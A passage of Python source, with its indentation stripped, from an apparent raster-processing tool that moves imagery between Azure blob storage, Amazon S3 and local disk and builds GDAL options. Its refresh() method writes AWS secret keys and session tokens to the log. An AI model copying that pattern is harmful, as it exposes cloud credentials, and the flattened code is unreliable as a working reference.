except Exception as e:
raise
if (is_raster):
if (not is_tmp_input):
return True
writeTo = output_path
self._base.message('[Azure-Pull] {}'.format(blob_source))
if (not is_raster):
writeTo = self._base.renameMetaFileToMatchRasterExtension(
writeTo)
result = self.__copyRemoteToLocal(
blob_source, writeTo, name=blob_source, method=TimeIt.Download, store=self._base)
if (not result):
return False
if (self._event_postCopyToLocal):
self._event_postCopyToLocal(writeTo)
# take care of (til) inputs.
if (til):
if (writeTo.lower().endswith(CTIL_EXTENSION_)):
if (til.addTIL(writeTo)):
til.setOutputPath(writeTo, writeTo)
# ends
# mark download/copy status
if (_resumeReporter):
_resumeReporter.updateRecordStatus(
blob_source, CRPT_COPIED, CRPT_YES)
# ends
# copy metadata files to -clonepath if set
# do not copy raster associated files to clone path.
if (not is_raster):
self._base.copyMetadataToClonePath(output_path)
# ends
# Handle any post-processing, if the final destination is to S3, upload right away.
if (isUpload):
if (getBooleanValue(_user_config.getValue(CISTEMPINPUT))):
if (is_raster):
if (writeTo.endswith(TarGzExt[1:])):
tarFile = tarfile.open(writeTo)
p, f = os.path.split(writeTo)
for x in tarFile.getmembers():
if (int(x.type) != 0):
continue
if (not filterPaths(x.name, _user_config.getValue(CCFG_RASTERS_NODE))):
if (not self._base.S3Upl(os.path.join(p, '{}/{}'.format(f.split(TarGzExt)[0], x.name)), user_args_Callback, **{TarGz: True})):
return False
tarFile.close()
os.remove(writeTo)
return True
_is_success = self._base.S3Upl(writeTo, user_args_Callback)
if (not _is_success):
return False
# ends
except Exception as e:
self._base.message('({})'.format(str(e)),
self._base.const_critical_text)
if (_resumeReporter):
_resumeReporter.updateRecordStatus(
blob_source, CRPT_COPIED, CRPT_NO)
return False
return True
@TimeIt.timeOperation
def upload(self, input_path, container_name, parent_folder, properties=None, **kwargs):
if (not input_path or
not container_name or
parent_folder is None):
return False
_parent_folder = parent_folder
if (not _parent_folder):
if (self._base.getUserConfiguration):
_parent_folder = self._base.getUserConfiguration.getValue(
CIN_AZURE_PARENTFOLDER)
if (_parent_folder == '/' or
_parent_folder is None):
_parent_folder = ''
if (properties):
prefix = CTEMPOUTPUT
if (TarGz in properties):
prefix = CTEMPINPUT
if (prefix in properties):
_tempoutput = properties[prefix]
_parent_folder = os.path.dirname(input_path.replace(
'\\', '/').replace(_tempoutput, _parent_folder))
usrPath = self._base.getUserConfiguration.getValue(
CUSR_TEXT_IN_PATH, False)
# default insert pos (sub-folder loc) for user text in output path
usrPathPos = CHASH_DEF_INSERT_POS
if (usrPath):
(usrPath, usrPathPos) = usrPath.split(CHASH_DEF_SPLIT_CHAR)
_parent_folder = self._base.insertUserTextToOutputPath('{}{}'.format(
_parent_folder, '/' if not _parent_folder.endswith('/') else ''), usrPath, usrPathPos)
super(Azure, self).upload(input_path,
container_name, _parent_folder, properties)
blob_path = self._input_file_path
blob_name = os.path.join(
self._upl_parent_folder, os.path.basename(blob_path))
## if (blob_name.endswith('.lrc')): # debug. Must be removed before release.
## return True # "
# return True # debug. Must be removed before release.
isContainerCreated = False
t0 = datetime.now()
time_to_wait_before_retry = 3
max_time_to_wait = 60
self.message('Accessing container ({})..'.format(
self._upl_container_name))
while(True):
try:
_access = properties['access'] if properties and 'access' in properties else None
self._blobSrvCli.create_container(
self._upl_container_name, public_access=_access)
isContainerCreated = True
break
except Exception as e:
get_err_msg = str(e).lower()
if (get_err_msg.find('the specified container is being deleted') == -1):
if (get_err_msg.find('already exists')):
isContainerCreated = True
break
tm_pre = datetime.now()
while(True):
time_delta = datetime.now() - tm_pre
if (time_delta.seconds > time_to_wait_before_retry):
break
t1 = datetime.now() - t0
if (t1.seconds > max_time_to_wait):
self.message('Timed out to create container.',
self.const_critical_text)
break
if (not isContainerCreated):
self.message('Unable to create the container ({})'.format(
self._upl_container_name), self.const_critical_text)
exit(1)
self.message('Done.')
st = datetime.now()
try:
from azure.storage.blob import ContentSettings
with open(blob_path, 'rb') as reader:
cli = self._blob_service.get_blob_client(blob_name)
mtype, encoding = (mimetypes.guess_type(blob_path))
self.message('Uploading ({})'.format(blob_path))
cli.upload_blob(
reader, overwrite=True, content_settings=ContentSettings(content_type=mtype))
except Exception as e:
self.message('File open/upload: ({})'.format(str(e)),
self.const_critical_text)
return False
finally:
self.message('Duration. ({} sec)'.format(
(datetime.now() - st).seconds))
self.message('Done.')
return True
class S3Storage:
RoleAccessKeyId = 'AccessKeyId'
RoleSecretAccessKey = 'SecretAccessKey'
RoleToken = 'Token'
def __init__(self, base):
self._base = base
self._isBucketPublic = False
self._isRequesterPay = False
self._isNoAccessToListBuckets = False
self._direction = CS3STORAGE_IN
def init(self, remote_path, s3_key, s3_secret, direction):
if (not isinstance(self._base, Base)):
return False
self._input_flist = None
self.__m_failed_upl_lst = {}
self.m_user_config = self._base.getUserConfiguration
self.CAWS_ACCESS_KEY_ID = s3_key
self.CAWS_ACCESS_KEY_SECRET = s3_secret
self._direction = direction
self.m_bucketname = '' # no default bucket-name
if (self.m_user_config):
s3_bucket = self.m_user_config.getValue('{}_S3_Bucket'.format(
'Out' if direction == CS3STORAGE_OUT else 'In'), False)
if (s3_bucket):
self.m_bucketname = s3_bucket
_profile_name = self.m_user_config.getValue('{}_S3_AWS_ProfileName'.format(
'Out' if direction == CS3STORAGE_OUT else 'In'), False)
# return type is a boolean hence no need to explicitly convert.
if (self.m_user_config.getValue(CCFG_PRIVATE_INC_BOTO)):
try:
awsSessionToken = None
sessionProfile = _profile_name
AWSSessionToken, AWSAccessKeyId, AWSSecretAccessKey = \
['{}{}'.format('OR_OUT_' if direction == CS3STORAGE_OUT else '', i) for i in [
'AWS_SESSION_TOKEN', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY']]
if (_profile_name and
_profile_name.lower().startswith('using_')):
roleInfo = self.getIamRoleInfo()
if (roleInfo is None):
return False
sessionProfile = None
self.CAWS_ACCESS_KEY_ID = roleInfo[self.RoleAccessKeyId]
self.CAWS_ACCESS_KEY_SECRET = roleInfo[self.RoleSecretAccessKey]
awsSessionToken = roleInfo[self.RoleToken]
# let's initialize the AWS env variables to allow GDAL to work when invoked externally.
os.environ[AWSAccessKeyId] = self.CAWS_ACCESS_KEY_ID
os.environ[AWSSecretAccessKey] = self.CAWS_ACCESS_KEY_SECRET
os.environ[AWSSessionToken] = awsSessionToken
# ends
if (not awsSessionToken):
if (AWSSessionToken in os.environ):
# it's assumed the [AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY] are also set by the client as env vars.
awsSessionToken = os.environ[AWSSessionToken]
import botocore
session = None
self._isBucketPublic = self.CAWS_ACCESS_KEY_ID is None and \
self.CAWS_ACCESS_KEY_SECRET is None and \
_profile_name is None
try:
session = boto3.Session(self.CAWS_ACCESS_KEY_ID if not sessionProfile else None, self.CAWS_ACCESS_KEY_SECRET if not sessionProfile else None,
profile_name=_profile_name if not awsSessionToken else None, aws_session_token=awsSessionToken if awsSessionToken else None)
except botocore.exceptions.ProfileNotFound as e:
self._base.message('Invalid profile name ({}), checking with AWS env variables..'.format(
_profile_name), self._base.const_warning_text)
if (AWSAccessKeyId in os.environ and
AWSSecretAccessKey in os.environ):
self.CAWS_ACCESS_KEY_ID = os.environ[AWSAccessKeyId]
self.CAWS_ACCESS_KEY_SECRET = os.environ[AWSSecretAccessKey]
session = boto3.Session(
self.CAWS_ACCESS_KEY_ID, self.CAWS_ACCESS_KEY_SECRET)
if (not session):
return False
endpointURL = None
AWSEndpointURL = 'aws_endpoint_url'
AWSRegion = 'region'
SessionProfile = 'profiles'
region = DefS3Region
if (_profile_name and
SessionProfile in session._session.full_config and
_profile_name in session._session.full_config[SessionProfile]):
if (AWSEndpointURL in session._session.full_config[SessionProfile][_profile_name]):
endpointURL = session._session.full_config[
SessionProfile][_profile_name][AWSEndpointURL]
self._base.message('Using {} endpoint> {}'.format(
'output' if direction == CS3STORAGE_OUT else 'input', endpointURL))
if (AWSRegion in session._session.full_config[SessionProfile][_profile_name]):
region = session._session.full_config[SessionProfile][_profile_name][AWSRegion]
profileCredentials = session.get_credentials()
if (profileCredentials):
# initialize access_key, secret_key using the profile.
self.CAWS_ACCESS_KEY_ID = session.get_credentials().access_key
self.CAWS_ACCESS_KEY_SECRET = session.get_credentials().secret_key
os.environ[AWSAccessKeyId] = self.CAWS_ACCESS_KEY_ID
os.environ[AWSSecretAccessKey] = self.CAWS_ACCESS_KEY_SECRET
else:
self._isBucketPublic = True
useAlibaba = endpointURL and endpointURL.lower().find(SigAlibaba) != -1
if (useAlibaba and
self._base.getUserConfiguration.getValue(UseToken)):
os.environ['OSS_ACCESS_KEY_ID'] = session.get_credentials(
).access_key
os.environ['OSS_SECRET_ACCESS_KEY'] = session.get_credentials(
).secret_key
self.m_user_config.setValue('{}oss'.format(
'in' if direction == CS3STORAGE_IN else 'out'), useAlibaba)
bucketCon = session.client('s3')
region = DefS3Region
try:
loc = bucketCon.get_bucket_location(Bucket=self.m_bucketname)[
'LocationConstraint']
if (loc):
region = loc
except Exception as e:
self._base.message(
'get/bucket/region ({})'.format(str(e)), self._base.const_warning_text)
self.con = session.resource('s3', region, endpoint_url=endpointURL if endpointURL else None, config=botocore.config.Config(
s3={'addressing_style': 'virtual'}))
if (self._isBucketPublic):
self.con.meta.client.meta.events.register(
'choose-signer.s3.*', botocore.handlers.disable_signing)
except Exception as e:
self._base.message(str(e), self._base.const_critical_text)
return False
try:
self.bucketupload = self.con.Bucket(self.m_bucketname)
if (direction == CS3STORAGE_OUT):
ACL = self.bucketupload.Acl()
if (ACL is not None):
grants = ACL.grants
isOutBktPrivate = True
for grant in grants:
grantInfo = grant['Grantee']
if (grantInfo['Type'] == 'Group' and
grantInfo['URI'] == 'http://acs.amazonaws.com/groups/global/AllUsers' and
grant['Permission'] == 'READ'):
isOutBktPrivate = False
break
if (isOutBktPrivate):
self._base.getUserConfiguration.setValue(
UseTokenOnOuput, True)
self.con.meta.client.head_bucket(Bucket=self.m_bucketname)
except botocore.exceptions.ClientError as e:
try:
errCode = int(e.response['Error']['Code'])
except ValueError as e:
errCode = -1
if (errCode == 403):
try:
fetchMeta = self.con.meta.client.head_object(
Bucket=self.m_bucketname, RequestPayer='requester', Key='_*CHS')
except Exception as e:
if (int(e.response['Error']['Code']) == 404):
self._isRequesterPay = True
os.environ['AWS_REQUEST_PAYER'] = 'requester'
# overrides, the cmd-line -usetoken plus the <UseToken> node value in the parameter file.
self._base.getUserConfiguration.setValue(
UseToken, True)
elif(int(e.response['Error']['Code']) == 403):
self._isNoAccessToListBuckets = True
if (not self._isRequesterPay and
not self._isNoAccessToListBuckets):
self._base.message('Invalid {} S3 bucket ({})/credentials.'.format(
CRESUME_HDR_OUTPUT if direction == CS3STORAGE_OUT else CRESUME_HDR_INPUT,
self.m_bucketname),
self._base.const_critical_text)
return False
os.environ[AWSAccessKeyId] = session.get_credentials(
).access_key
os.environ[AWSSecretAccessKey] = session.get_credentials(
).secret_key
except Exception as e:
self._base.message(str(e), self._base.const_critical_text)
return False
_remote_path = remote_path
if (_remote_path and
os.path.isfile(_remote_path)): # are we reading a file list?
self._input_flist = _remote_path
try:
global _rpt
_remote_path = _rpt.root
except Exception as e:
self._base.message('Report ({})'.format(
str(e)), self._base.const_critical_text)
return False
self.remote_path = self._base.convertToForwardSlash(_remote_path)
if (not self.remote_path):
self.remote_path = '' # defaults to bucket root.
return True
def getIamRoleInfo(self):
roleMetaUrl = 'http://169.254.169.254/latest/meta-data/iam/security-credentials'
urlResponse = None
try:
urlResponse = urlopen(roleMetaUrl)
IamRole = urlResponse.read().decode('utf-8')
if (IamRole.find('404') != -1):
return None
urlResponse.close()
urlResponse = urlopen('{}/{}'.format(roleMetaUrl, IamRole))
roleInfo = json.loads(urlResponse.read())
except Exception as e:
self._base.message('IAM Role not found.\n{}'.format(
str(e)), self._base.const_critical_text)
return None
finally:
if (urlResponse):
urlResponse.close()
if (self.RoleAccessKeyId in roleInfo and
self.RoleSecretAccessKey in roleInfo and
self.RoleToken in roleInfo):
return roleInfo
return None
def getEndPoint(self, domain):
redirectEndPoint = domain
try:
urlResponse = urlopen(domain)
doc = minidom.parseString(urlResponse.read())
endPoint = doc.getElementsByTagName('Endpoint')
redirectEndPoint = 'http://{}/'.format(
endPoint[0].firstChild.nodeValue)
except Exception as e:
pass
return redirectEndPoint
@property
def inputPath(self):
return self.__m_input_path
@inputPath.setter
def inputPath(self, value):
self.__m_input_path = value
def getFailedUploadList(self):
return self.__m_failed_upl_lst
def list(self, connection, bucket, prefix, includeSubFolders=False, keys=[], marker=''):
try: # requires/ListObjects access.
result = connection.meta.client.list_objects(
Bucket=bucket, Prefix=prefix, Delimiter='/', Marker=marker, RequestPayer='requester' if self._isRequesterPay else '')
except Exception as e:
self._base.message(str(e), self._base.const_critical_text)
return False
Contents = 'Contents'
NextMarker = 'NextMarker'
if (Contents in result):
for k in result[Contents]:
keys.append(k['Key'])
for item in result.get('CommonPrefixes', []):
if (not includeSubFolders):
if (item['Prefix'].endswith('/')):
continue
self.list(connection, bucket, item.get('Prefix'),
includeSubFolders, keys, marker)
if (NextMarker in result):
self.list(connection, bucket, prefix,
includeSubFolders, keys, result[NextMarker])
return keys
def getS3Content(self, prefix, cb=None, precb=None):
isLink = self._input_flist is not None
subs = True
if (self.m_user_config):
root_only_ = self.m_user_config.getValue('IncludeSubdirectories')
if (subs is not None): # if there's a value, take it else defaults to (True)
subs = self._base.getBooleanValue(root_only_)
keys = self.list(self.con, self.m_bucketname, prefix,
includeSubFolders=subs, keys=[], marker='') if not isLink else _rpt
if (not keys):
return False
isRoot = self.remote_path == '/'
# get the til files first
if (til):
if (not til.TILCount):
try:
for key in keys:
if (not key or
key.endswith('/')):
continue
if (key.lower().endswith(CTIL_EXTENSION_)):
# remote path following the input folder/.
S3_path = key.replace(
self.remote_path if not isRoot else '', '')
# callback on the client-side
cb(key, S3_path)
outputPath = self.m_user_config.getValue(
CCFG_PRIVATE_OUTPUT, False) + S3_path
isCloudUpload = self._base.getBooleanValue(
self.m_user_config.getValue(CCLOUD_UPLOAD))
if ((self.m_user_config.getValue(CISTEMPOUTPUT)) and
isCloudUpload):
# -tempoutput must be set with -cloudoutput=true
outputPath = self.m_user_config.getValue(
CTEMPOUTPUT, False) + S3_path
til.addTIL(key)
til.setOutputPath(key, outputPath)
tilObj = self.con.meta.client.get_object(
Bucket=self.m_bucketname, Key=key)
tilContentsAsString = tilObj['Body'].read().decode(
'utf-8')
til.processInMemoryTILContent(
key, tilContentsAsString)
except Exception as e:
self._base.message(
str(e), self._base.const_critical_text)
return False
# ends
try:
threads = []
keysIndx = 0
nBuffer = CCFG_THREADS
while(1):
nThreads = len(threads)
while(nThreads > 0):
alive = [t.is_alive() for t in threads]
nDead = sum(not x for x in alive)
if (nDead):
nBuffer = nDead
threads = [t for t in threads if t.is_alive()]
break
buffer = []
if (keysIndx == 0):
if (keys[keysIndx].endswith('/')):
keysIndx += 1
for i in range(keysIndx, keysIndx + nBuffer):
if (i >= len(keys)):
break
buffer.append(keys[i])
keysIndx += nBuffer
if (len(buffer) == 0 and
len(threads) == 0):
break
for key in buffer:
try:
# remote path following the input folder/.
remotePath = key.replace(
self.remote_path if not isRoot else '', '')
if (not key or
key.endswith('/')):
continue
if (cb):
if (precb):
# is raster/exclude list?
if (precb(remotePath, self.remote_path, self.inputPath)):
copyRemoteRaster = False
if (til and
til.defaultTILProcessing and
til.fileTILRelated(os.path.basename(key))):
# copy ancillary TIL files if the default TIL processing is set to (true)
copyRemoteRaster = True
if (not copyRemoteRaster and
not key.lower().endswith(CTIL_EXTENSION_)): # TIL is a raster but we need to copy it locally.
if (not self._base.getBooleanValue(self.m_user_config.getValue(CISTEMPINPUT))):
continue
t = threading.Thread(target=cb,
args=(key, remotePath))
t.daemon = True
t.start()
threads.append(t)
except Exception as e:
self._base.message(
str(e), self._base.const_critical_text)
return False
except Exception as e:
self._base.message(str(e), self._base.const_critical_text)
return False
return True
@TimeIt.timeOperation
def __copyRemoteToLocal(self, S3_key, mk_path, **kwargs):
try:
self.con.meta.client.download_file(self.m_bucketname, S3_key, mk_path, ExtraArgs={
'RequestPayer': 'requester'} if self._isRequesterPay else {})
except Exception as e:
msg = str(e)
isRefreshToken = msg.find('(ExpiredToken)') != -1
if (isRefreshToken):
if ('fptrRefresh' in kwargs):
bucket = kwargs['fptrRefresh']()
if (bucket):
ret = self.__copyRemoteToLocal(S3_key, mk_path, **kwargs) # retry once
if (ret):
return True
self._base.message('({}\n{})'.format(
str(e), mk_path), self._base.const_critical_text)
if (_rpt):
_rpt.updateRecordStatus(S3_key, CRPT_COPIED, CRPT_NO)
return False
return True
def S3_copy_to_local(self, S3_key, S3_path):
err_msg_0 = 'S3/Local path is invalid'
if (S3_key is None): # get rid of invalid args.
self._base.message(err_msg_0)
return False
# what does the restore point say about the (S3_key) status?
if (_rpt):
_get_rstr_val = _rpt.getRecordStatus(S3_key, CRPT_COPIED)
if (_get_rstr_val == CRPT_YES):
self._base.message('{} {}'.format(CRESUME_MSG_PREFIX, S3_key))
return True
# ends
if (self.m_user_config is None): # shouldn't happen
self._base.message(
'Internal/User config not initialized.', self._base.const_critical_text)
return False
output_path = self.m_user_config.getValue(
CCFG_PRIVATE_OUTPUT, False) + S3_path
is_cpy_to_s3 = self._base.getBooleanValue(
self.m_user_config.getValue(CCLOUD_UPLOAD))
if ((self.m_user_config.getValue(CISTEMPOUTPUT)) and
is_cpy_to_s3):
# -tempoutput must be set with -cloudoutput=true
output_path = self.m_user_config.getValue(
CTEMPOUTPUT, False) + S3_path
is_raster = False
is_tmp_input = self._base.getBooleanValue(
self.m_user_config.getValue(CISTEMPINPUT))
primaryRaster = None
if (_rpt and
is_tmp_input):
primaryRaster = _rpt._m_rasterAssociates.findPrimaryExtension(
S3_path)
if (filterPaths(S3_key, self.m_user_config.getValue(CCFG_EXCLUDE_NODE))):
return False
elif (primaryRaster or # if the S3_key is an associated raster file, consider it as a raster.
filterPaths(S3_key, self.m_user_config.getValue(CCFG_RASTERS_NODE))):
isTIL = output_path.lower().endswith(CTIL_EXTENSION_)
if (is_tmp_input):
if (not isTIL):
useTempInputPath = True
if (til and
til.fileTILRelated(S3_path) and
til.defaultTILProcessing):
useTempInputPath = False
if (useTempInputPath):
output_path = self.m_user_config.getValue(
CTEMPINPUT, False) + S3_path
is_raster = not isTIL
if (self.m_user_config.getValue('Pyramids') == CCMD_PYRAMIDS_ONLY):
return False
# collect input file names.
if (fn_collect_input_files(S3_key)):
return False
# ends
mk_path = output_path
self._base.message('[S3-Pull] %s' % (mk_path))
mk_path = self._base.renameMetaFileToMatchRasterExtension(mk_path)
flr = os.path.dirname(mk_path)
if (not os.path.exists(flr)):
try:
makedirs(flr)
except Exception as e:
self._base.message('(%s)' %
(str(e)), self._base.const_critical_text)
if (_rpt):
_rpt.updateRecordStatus(S3_key, CRPT_COPIED, CRPT_NO)
return False
# let's write remote to local
result = self.__copyRemoteToLocal(
S3_key, mk_path, name=S3_key, method=TimeIt.Download, store=self._base, fptrRefresh=self.refresh)
if (not result):
return False
# ends
# mark download/copy status
if (_rpt):
_rpt.updateRecordStatus(S3_key, CRPT_COPIED, CRPT_YES)
# ends
# copy metadata files to -clonepath if set
if (not is_raster): # do not copy raster associated files to clone path.
self._base.copyMetadataToClonePath(mk_path)
# ends
# Handle any post-processing, if the final destination is to S3, upload right away.
if (is_cpy_to_s3):
if (getBooleanValue(self.m_user_config.getValue(CISTEMPINPUT))):
if (is_raster):
return True
if (til and
til.defaultTILProcessing and
is_raster and
til.fileTILRelated(mk_path)):
return True
_is_success = self._base.S3Upl(mk_path, user_args_Callback)
if (not _is_success):
return False
# ends
return True
# ends
def upload(self):
self._base.message('[S3-Push]..')
for r, d, f in os.walk(self.inputPath):
for file in f:
lcl_file = os.path.join(r, file).replace('\\', '/')
upl_file = lcl_file.replace(self.inputPath, self.remote_path)
self._base.message(upl_file)
try:
S3 = S3Upload(self.bucketupload, upl_file, lcl_file, self.m_user_config.getValue(
COUT_S3_ACL) if self.m_user_config else None)
if (not S3.init()):
self._base.message('Unable to initialize [S3-Push] for (%s=%s)' % (
lcl_file, upl_file), self._base.const_warning_text)
continue
ret = S3.upload()
if (not ret):
self._base.message(
'[S3-Push] (%s)' % (upl_file), self._base.const_warning_text)
continue
except Exception as e:
self._base.message('(%s)' %
(str(e)), self._base.const_warning_text)
finally:
if (S3 is not None):
del S3
return True
def _addToFailedList(self, localPath, remotePath):
if ('upl' not in self.getFailedUploadList()):
self.__m_failed_upl_lst['upl'] = []
_exists = False
for v in self.__m_failed_upl_lst['upl']:
if (v['local'] == localPath):
_exists = True
break
if (not _exists):
self.__m_failed_upl_lst['upl'].append(
{'local': localPath, 'remote': remotePath})
return True
def upload_group(self, input_source, single_upload=False, include_subs=False):
global _rpt
m_input_source = input_source.replace('\\', '/')
input_path = os.path.dirname(m_input_source)
upload_buff = []
usrPath = self.m_user_config.getValue(CUSR_TEXT_IN_PATH, False)
# default insert pos (sub-folder loc) for user text in output path
usrPathPos = CHASH_DEF_INSERT_POS
if (usrPath):
(usrPath, usrPathPos) = usrPath.split(CHASH_DEF_SPLIT_CHAR)
(p, e) = os.path.splitext(m_input_source)
for r, d, f in os.walk(input_path):
for file in f:
mk_path = os.path.join(r, file).replace('\\', '/')
if ((single_upload and
(mk_path == m_input_source)) or
mk_path.startswith('{}.'.format(p))):
try:
S3 = _source_path = None
if (_rpt):
_source_path = getSourcePathUsingTempOutput(
mk_path)
if (_source_path):
_ret_val = _rpt.getRecordStatus(
_source_path, CRPT_UPLOADED)
if (_ret_val == CRPT_YES):
continue
upl_file = mk_path.replace(
self.inputPath, self.remote_path)
if (getBooleanValue(self.m_user_config.getValue(CCLOUD_UPLOAD))):
rep = self.inputPath
if (not rep.endswith('/')):
rep += '/'
if (getBooleanValue(self.m_user_config.getValue(CISTEMPOUTPUT))):
rep = self.m_user_config.getValue(
CTEMPOUTPUT, False)
upl_file = mk_path.replace(rep, self.remote_path if self.m_user_config.getValue(
'iss3') else self.m_user_config.getValue(CCFG_PRIVATE_OUTPUT, False))
if (usrPath):
upl_file = self._base.insertUserTextToOutputPath(
upl_file, usrPath, usrPathPos)
S3 = S3Upload(self._base, self.bucketupload, upl_file, mk_path, self.m_user_config.getValue(
COUT_S3_ACL) if self.m_user_config else None)
if (not S3.init()):
self._base.message('Unable to initialize S3-Upload for (%s=>%s)' % (
mk_path, upl_file), self._base.const_warning_text)
self._addToFailedList(mk_path, upl_file)
continue
upl_retries = CS3_UPLOAD_RETRIES
ret = False
while(upl_retries and not ret):
ret = S3.upload(
name=_source_path, method=TimeIt.Upload, store=self._base, fptrRefresh = self.refresh)
if (not ret):
# let's sleep for a while until s3 kick-starts
time.sleep(10)
upl_retries -= 1
self._base.message('[S3-Push] (%s), retries-left (%d)' % (
upl_file, upl_retries), self._base.const_warning_text)
if (not ret):
self._addToFailedList(mk_path, upl_file)
if (S3 is not None):
del S3
S3 = None
continue
except Exception as inf:
self._base.message(
'(%s)' % (str(inf)), self._base.const_critical_text)
finally:
if (S3 is not None):
del S3
S3 = None
# successful entries to return.
upload_buff.append(mk_path)
if (single_upload):
return upload_buff
if (not include_subs):
return upload_buff
return upload_buff # this could be empty.
def refresh(self):
self._base.message('Refreshing token to {}...'.format('read' if self._direction == CS3STORAGE_IN else 'write'))
ret = self.init(self.remote_path, self.CAWS_ACCESS_KEY_ID, self.CAWS_ACCESS_KEY_SECRET, self._direction)
roleInfo = self.getIamRoleInfo()
self._base.message(
'Refreshed token info,\n{}\n{}\n{}\n{}'.format(ret,
roleInfo[self.RoleAccessKeyId],
roleInfo[self.RoleSecretAccessKey],
roleInfo[self.RoleToken])
)
if (not ret):
return None
return self.bucketupload
# ends
CIDX_USER_INPUTFILE = 0
CIDX_USER_CONFIG = 2
CIDX_USER_CLSBASE = 3
CCFG_BLOCK_SIZE = 512
CCMD_PYRAMIDS_ONLY = 'only'
CCMD_PYRAMIDS_EXTERNAL = 'external'
CCMD_PYRAMIDS_SOURCE = 'source' # Used by CreateRasterProxy
CCFG_THREADS = 10
CCFG_RASTERS_NODE = 'RasterFormatFilter'
CCFG_EXCLUDE_NODE = 'ExcludeFilter'
CCFG_PRIVATE_INC_BOTO = '__inc_boto__'
CCFG_PRIVATE_OUTPUT = '__output__'
CFGAZSAS = '__szsas__'
CFGAZSASW = '__szsasw__'
CCFG_LAMBDA_INVOCATION_ERR = '__LAMBDA_INV_ERR__'
CCFG_INTERLEAVE = 'Interleave'
CCFG_PREDICTOR = 'Predictor'
# log status
const_general_text = 0
const_warning_text = 1
const_critical_text = 2
const_status_text = 3
# ends
def messageDebug(msg, status):
print('*{}'.format(msg))
def Message(msg, status=0):
print(msg)
def args_Callback(args, user_data=None):
_LERC = 'lerc'
_LERC2 = 'lerc2'
_JPEG = 'jpeg'
_JPEG12 = 'jpeg12'
m_compression = _LERC # default if external config is faulty
m_lerc_prec = None
m_compression_quality = DefJpegQuality
m_bsize = CCFG_BLOCK_SIZE
m_mode = 'chs'
m_nodata_value = None
m_predictor = 1
m_interleave = 'PIXEL'
isCOG = False
if (user_data):
try:
userParameters = user_data[CIDX_USER_CONFIG].getValue(
'GDAL_Translate_UserParameters')
if (userParameters):
[args.append(i) for i in userParameters.split()]
compression_ = user_data[CIDX_USER_CONFIG].getValue(
'Compression').lower()
useCOGTIFF = user_data[CIDX_USER_CONFIG].getValue('cog') == True
if (useCOGTIFF):
compression_ = 'deflate'
if (compression_):
m_compression = compression_
compression_quality_ = user_data[CIDX_USER_CONFIG].getValue(
'Quality')
if (compression_quality_):
m_compression_quality = compression_quality_
bsize_ = user_data[CIDX_USER_CONFIG].getValue('BlockSize')
if (bsize_):
m_bsize = bsize_
lerc_prec_ = user_data[CIDX_USER_CONFIG].getValue('LERCPrecision')
if (lerc_prec_):
m_lerc_prec = lerc_prec_
m_nodata_value = user_data[CIDX_USER_CONFIG].getValue(
'NoDataValue')
m_ignorealphaband = getBooleanValue(
user_data[CIDX_USER_CONFIG].getValue('IgnoreAlphaBand'))
m_mode = user_data[CIDX_USER_CONFIG].getValue('Mode')
m_predictor_ = user_data[CIDX_USER_CONFIG].getValue(CCFG_PREDICTOR)
if (m_predictor_):
m_predictor = m_predictor_
m_interleave_ = user_data[CIDX_USER_CONFIG].getValue(
CCFG_INTERLEAVE)
if (m_interleave_):
m_interleave = m_interleave_.upper()
mode_ = m_mode.split('_')
if (len(mode_) > 1):
m_mode = mode_[0] # mode/output
if (mode_[1].lower() == 'cog'):
m_mode = mode_[1]
isCOG = True
else:
m_compression = mode_[1].lower() # compression
if (m_mode.startswith(('tif', 'cog'))):
args.append('-co')
args.append('BIGTIFF=IF_NEEDED')
if (not isCOG):
args.append('-co')
args.append('TILED=YES')
m_mode = 'GTiff' # so that gdal_translate can understand.
if (m_interleave == 'PIXEL' and
m_compression.startswith(_JPEG)):
_base = user_data[CIDX_USER_CLSBASE]
if (_base):
gdalInfo = GDALInfo(_base)
gdalInfo.init(user_data[CIDX_USER_CONFIG].getValue(
CCFG_GDAL_PATH, False))
if (gdalInfo.process(user_data[CIDX_USER_INPUTFILE])):
ret = gdalInfo.bandInfo
if (ret and
len(ret) != 1):
if (not isCOG): # To omit the GDAL warning, COG driver by default selects the PHOTOMETRIC=YCBCR for jpeg compression.
args.append('-co')
args.append('PHOTOMETRIC=YCBCR')
if (m_compression == _JPEG12):
args.append('-co')
args.append('NBITS=12')
m_compression = _JPEG
if (m_interleave == 'PIXEL' and
m_compression in ('deflate', 'lzw')):
args.append('-co')
args.append('predictor={}'.format(m_predictor))
except BaseException: # could throw if index isn't found
pass # ingnore with defaults.
args.append('-of')
args.append(m_mode)
args.append('-co')
args.append('COMPRESS=%s' %
(_LERC if m_compression == _LERC2 else m_compression))
if (m_nodata_value):
args.append('-a_nodata')
args.append(str(m_nodata_value))
if (m_compression == _JPEG):
args.append('-co')
if (m_mode == 'mrf'): # if the output is (mrf)
args.append('QUALITY=%s' % (m_compression_quality))
if (m_ignorealphaband):
args.append('-co')
args.append('OPTIONS="MULTISPECTRAL:1"')
else:
args.append('{}QUALITY={}'.format('JPEG_' if not isCOG else '', m_compression_quality))
if (not isCOG):
args.append('-co')
args.append('INTERLEAVE=%s' % (m_interleave))
if (m_compression.startswith(_LERC)):
if (m_lerc_prec or
m_compression == _LERC2 or
m_compression == _LERC):
args.append('-co')
args.append('OPTIONS="{}{}"'.format('' if not m_lerc_prec else 'LERC_PREC={}'.format(m_lerc_prec), '{}V2=ON'.format(
' ' if m_lerc_prec else '') if m_compression == _LERC2 or m_compression == _LERC else ''))
args.append('-co')
if (m_mode.lower() == 'gtiff'):
args.append('{}={}'.format('BLOCKXSIZE', m_bsize))
args.append('-co')
args.append('{}={}'.format('BLOCKYSIZE', m_bsize))
else:
args.append('{}={}'.format('BLOCKSIZE', m_bsize))
return args
def args_Callback_for_meta(args, user_data=None):
_LERC = 'lerc'
_LERC2 = 'lerc2'
m_scale = 2
m_bsize = CCFG_BLOCK_SIZE
m_pyramid = True
m_comp = _LERC
m_lerc_prec = None
m_compression_quality = DefJpegQuality
if (user_data):
try:
scale_ = user_data[CIDX_USER_CONFIG].getValue('Scale')
if (scale_):
m_scale = scale_
bsize_ = user_data[CIDX_USER_CONFIG].getValue('BlockSize')
if (bsize_):
m_bsize = bsize_
ovrpyramid = user_data[CIDX_USER_CONFIG].getValue('isuniformscale')
if (ovrpyramid is not None):
m_pyramid = ovrpyramid
if (m_pyramid == 'source'):
rpt = user_data[CIDX_USER_CLSBASE].getUserConfiguration.getValue(
CPRT_HANDLER)
if (rpt):
cldInput = user_data[CIDX_USER_CONFIG].getValue(
CIN_S3_PREFIX, False)
